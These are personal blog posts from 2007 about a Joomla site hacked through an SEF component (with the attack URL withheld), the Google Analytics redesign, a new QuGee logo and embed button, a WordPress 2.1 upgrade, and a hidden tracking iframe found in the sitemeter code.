September 4, 2007 3:09 pm
One of my joomla site (Design and Hosting) got hacked again! Usually I just fixed the configuartion file knowing that it will do the job, but also knowing that the vulnerabilities are still there. So this time I’ve decided to track down the problem, found out from the log that it was hacked by someone in Turkey using a something called R57shell! How it works on the other side seems quite simple, in this case the url used was
I won’t show the last part but it’s url to a site containing the r57shell script. And that’s it, they can view and change all all the files and directory! Anyway, in my case the problem was caused by a sef components used to rewrite the urls. Have no time to fix it now, only took out the hacked files. Will do a clean install this time since the current one is quite ‘broken’, until then, the site will be done. If you also uses Joomla, here are some guides which I found useful…
A lot of them are common sense like keeping the software up to date… can’t be lazy sometimes, will just end up spending more time fixing it after the damaged has been done!
— Update 17:10 —
Site back online! Using a different component for url rewrite this time, hopefully it won’t be hacked again soon…
Google keeps improving, they just released a new version of the Goolge Analytics yesterday. The main differences for me is the interface, when I compared sitemeter and Google Analytics last time, I mentioned that sitemeter has a simpler interface. With this new version, I feel that they have managed to put in as much information as possible in a user friendly way. It does take some time to get use to and they are new features which I haven’t try as well, e.g. the customisable dashboard. Remember, Google Analytics is free, Google is quite amazing. Here are some screenshots which I took:
Overview – Summary page
Thanks to Jac, we now have a new QuGee Logo:
And also some changes to our QuGee frontpage, also new web buttons and badges:
If you want to put it on your site, this is the code:
<a href=”http://www.qugee.com/”><img title=”QuGee button” src=”http://www.qugee.com/images/qugee_button.gif” alt=”QuGee button” height=”15″ width=”80″ /></a>
Of course this is only one of the many ways to add the button. Lastly there are some very nice wallpapers which you can found on this page.
WordPress 2.1 has been released for quite a while now, but knowing that there could be many problems with plugins and I don’t want the website to be down for a long time, I have decided to leave it later. Finally got sometime this weekend, I have decided it’s time to upgread. Did the usual backups and search for new versions of all the plugins. Disable them all during the upgrade, overwrite the current wordpress with the new one, ran the upgrade script and everything was working except one or two plugins. Even WPG2, the wordpress-gallery2 plugin which I was worry of not working works without any further configuration.
Since I started upgrading the site, I tried out a few new plugins including the one on the stats page to show who’s online and another anti-spam image plugins. One feature which I really like about wordpress 2.1 is that in the edit page, it has two tabs for switching between Visual and Code rather than before where it pops up a window for editing the HTML code. I really appreciate and quite impressive with open source software!
Today, sitemeter is down again and I went to check the code on my site using a firefox plugin and found that as well as the code that I expect to see, there is something extra:
<iframe width=”0″ height=”0″ frameborder=”0″ xsrc=”http://dg.specificclick.net/?u=http%3A//vinlai.com/blog/&r=” style=”display: none;”>
Wondering why is sitemeter sending info to dg.specificclick.net? Me too! Did a search on google and found this post on “SiteMeter and Spyware (Sort of)“, it was found that this piece of code will return a set of tracking cookies. So I cleared my cookies and reload this page again, didn’t find any suspecious cookies yet, only cookies from sitemeter themselves so will check at a later time or another computer to confirm.
The sitemeter site has been down for 2 days for me so I started searching to see if other people are experience a similar problem. Other than finding out that some others are experiencing the same problem, I accidentally find a post on “Did Sitemeter sell out to Spyware?“. I did a few more search to see if sitemeter is really sold out to Spyware, but that’s up to you to decide, I would still consider it as unconfirmed. However due to the server being down for me for 2 days, I’m really considering of taking it out for this site and just use Google Analytics instead. If you are also using sitemeter, find out more for yourself from the link above.